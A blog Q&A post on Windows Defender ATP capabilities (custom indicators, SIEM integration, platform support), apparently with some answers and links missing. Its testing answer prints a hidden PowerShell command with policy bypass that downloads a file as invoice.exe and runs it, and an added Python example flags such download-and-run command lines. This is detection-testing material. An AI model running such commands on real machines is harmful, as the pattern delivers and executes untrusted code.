SharePoint Stuff

Windows Defender Advanced Threat Protection (WDATP) Q&A

Written by Luke Smith. Posted in Microsoft

Q: Can you configure Defender ATP to use additional or different security threat feeds, such as FireEye, LookingGlass, Infoblox, SecureWorks, RSA, McAfee or a customer prebuilt feed?
Q: Are you able to block particular MD5\applications?
A: You can create custom IOCs and TIs using API or PS
Q: Can you define automatic custom isolation and block rules (based on MD5 and application names)?
Q: Can you change the ratings of the existing threat categories?
A: Only for custom Indicators of Compromise (IOCs) or Threat Intelligence (TIs)
Q: Can you integrate with other SIEMs\SOCs?
A: Currently only HP and Splunk
Q: Can Defender ATP integrate with third-party CMDBs?
A: AD using AD Connect – TBC for third parties such as SCCM\LANDesk
Q: Can Windows Defender ATP integrate with Office ATP?
A: Yes, WDATP and O365ATP can be integrated and need enabling as per the following: and
Q: Can Defender ATP work with older versions of Windows below 8.1?
A: No, but it does work with Windows Server 2012 R2 and above
Q: Can Defender ATP work with non-Windows-based machines?
A: Yes, it requires Bitdefender and can run on macOS, Linux, iOS and Android. (Other third parties such as Lookout and Ziften will be added Nov 2017.)
Q: Can Defender integrate with Cloud App Security?
Q: How can I test Defender ATP?
A: see: – text file containing remove the <>
A: once configured and also run:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('', 'C:\test-WDATP-test\invoice.exe');Start-Process 'C:\test-WDATP-test\invoice.exe'
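
As an added illustration (not part of the original post, and not a description of how Defender ATP itself raises the alert), this Python example flags process command lines that combine the traits visible in the test command above: policy bypass, hidden window, WebClient download, and starting the file that was just downloaded. The trait names, the sample command lines and the placeholder URL are constructed for the example.

```python
import re

# Traits visible in the page's test command line; the trait names are this
# example's own labels, not Defender ATP alert names.
TRAITS = {
    "policy_bypass": re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass\b", re.I),
    "hidden_window": re.compile(r"-(?:WindowStyle|w)\s+Hidden\b", re.I),
    "web_download": re.compile(r"Net\.WebClient\)?\s*\.\s*DownloadFile\s*\(", re.I),
}
QUOTES = "'\"\u2018\u2019"  # PowerShell also accepts typographic quotes
# Second argument of DownloadFile(url, path), and the Start-Process target.
SAVED = re.compile(r"DownloadFile\s*\([^,]*,\s*[%s]([^%s]+)[%s]" % ((QUOTES,) * 3), re.I)
STARTED = re.compile(r"Start-Process\s+[%s]([^%s]+)[%s]" % ((QUOTES,) * 3), re.I)


def analyse(cmdline):
    """Return the set of traits found in one process command line."""
    found = {name for name, rx in TRAITS.items() if rx.search(cmdline)}
    saved, started = SAVED.search(cmdline), STARTED.search(cmdline)
    # Download-then-run: the file written by DownloadFile is the one started.
    if saved and started and saved.group(1).lower() == started.group(1).lower():
        found.add("download_then_run")
    return found


def is_suspicious(cmdline):
    """Flag only when a download is combined with execution or concealment."""
    t = analyse(cmdline)
    return "download_then_run" in t or {"web_download", "hidden_window"} <= t


# Constructed sample command lines; the URL is a placeholder.
SAMPLES = [
    "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden "
    "(New-Object System.Net.WebClient).DownloadFile('http://example.invalid/x', "
    "'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(is_suspicious(s), sorted(analyse(s)))
```

Requiring a download plus either execution or a hidden window keeps routine admin scripts that only use -ExecutionPolicy Bypass from being flagged.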

Useful Links:
Windows Defender Advanced Threat Protection – Ransomware response playbook


Luke Smith

I’ve been working with Microsoft Technologies for over 20 years, my main focus now being Microsoft Online Services. I manage the Cloud Services at ElysianIT Limited and as a P-SELLER at Microsoft. I have worked with many organisations from SMC to Enterprise. I’ve been working with Microsoft Technologies since DOS 5.0; to date I have been working on Microsoft’s latest cloud technology: Windows Azure, Windows 10, Office 365 and Microsoft SharePoint.